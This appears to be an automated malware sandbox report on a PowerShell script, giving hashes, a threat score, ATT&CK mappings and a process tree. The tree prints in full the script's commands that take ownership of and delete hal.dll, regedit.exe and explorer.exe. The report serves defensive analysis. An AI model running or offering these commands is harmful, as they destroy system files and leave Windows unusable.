1fa4798175b880d1f5c1ab639a142ead7e65557cd0b6c5c670dc7ceb553b7c7b

General

Target

target.ps1
Size

435B
MD5

71ab9a49fe51c63f4c47754c3a2ba9e7
SHA1

d70cd8f23ed813b7219e8ec674cdfda3b3046b47
SHA256

1fa4798175b880d1f5c1ab639a142ead7e65557cd0b6c5c670dc7ceb553b7c7b
SHA512

e415a7edc9e4dd53bda2049526f896e68c8e57ae8152a1363c0b1593f5b5409343dc49646b2a3973e391f996ca8739aefeb8548e259516855e0de4d0b2bc62ce

Score

8^/10

discovery execution exploit

Malware Config

Signatures

Possible privilege escalation attempt 6 IoCs

exploit

pid	Process
4248	takeown.exe
3088	icacls.exe
4856	takeown.exe
2588	icacls.exe
2828	takeown.exe
1880	icacls.exe

Modifies file permissions 1 TTPs 6 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2828	takeown.exe
1880	icacls.exe
4248	takeown.exe
3088	icacls.exe
4856	takeown.exe
2588	icacls.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4504	powershell.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
1576	taskkill.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4504	powershell.exe
4504	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	4504	powershell.exe
Token: SeTakeOwnershipPrivilege	4856	takeown.exe
Token: SeTakeOwnershipPrivilege	2828	takeown.exe
Token: SeTakeOwnershipPrivilege	4248	takeown.exe
Token: SeDebugPrivilege	1576	taskkill.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 4504 wrote to memory of 2116	4504	powershell.exe	86
PID 4504 wrote to memory of 2116	4504	powershell.exe	86
PID 2116 wrote to memory of 4856	2116	cmd.exe	88
PID 2116 wrote to memory of 4856	2116	cmd.exe	88
PID 2116 wrote to memory of 2588	2116	cmd.exe	89
PID 2116 wrote to memory of 2588	2116	cmd.exe	89
PID 4504 wrote to memory of 2796	4504	powershell.exe	90
PID 4504 wrote to memory of 2796	4504	powershell.exe	90
PID 2796 wrote to memory of 2828	2796	cmd.exe	91
PID 2796 wrote to memory of 2828	2796	cmd.exe	91
PID 2796 wrote to memory of 1880	2796	cmd.exe	92
PID 2796 wrote to memory of 1880	2796	cmd.exe	92
PID 4504 wrote to memory of 4964	4504	powershell.exe	93
PID 4504 wrote to memory of 4964	4504	powershell.exe	93
PID 4964 wrote to memory of 4248	4964	cmd.exe	94
PID 4964 wrote to memory of 4248	4964	cmd.exe	94
PID 4964 wrote to memory of 3088	4964	cmd.exe	95
PID 4964 wrote to memory of 3088	4964	cmd.exe	95
PID 4964 wrote to memory of 1576	4964	cmd.exe	96
PID 4964 wrote to memory of 1576	4964	cmd.exe	96

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\target.ps1
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4504
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\hal.dll && icacls C:\Windows\System32\hal.dll /grant Everyone:(F) && del/f C:\Windows\System32\hal.dll"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2116
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\hal.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4856
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\hal.dll /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2588
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\regedit.exe && icacls C:\Windows\regedit.exe /grant Everyone:(F) && del/f C:\Windows\regedit.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2796
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\regedit.exe
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2828
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\regedit.exe /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1880
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\explorer.exe && icacls C:\Windows\explorer.exe /grant Everyone:(F) && taskkill /f /im explorer.exe && del/f C:\Windows\explorer.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4964
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\explorer.exe
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4248
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\explorer.exe /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3088
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im explorer.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1576

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

1

T1222

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5gcveler.qp4.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/4504-0-0x00007FFF66993000-0x00007FFF66995000-memory.dmp

Filesize
8KB

Download
memory/4504-1-0x000001AF46730000-0x000001AF46752000-memory.dmp

Filesize
136KB

Download
memory/4504-11-0x00007FFF66990000-0x00007FFF67451000-memory.dmp

Filesize
10.8MB

Download
memory/4504-12-0x00007FFF66990000-0x00007FFF67451000-memory.dmp

Filesize
10.8MB

Download
memory/4504-15-0x00007FFF66990000-0x00007FFF67451000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing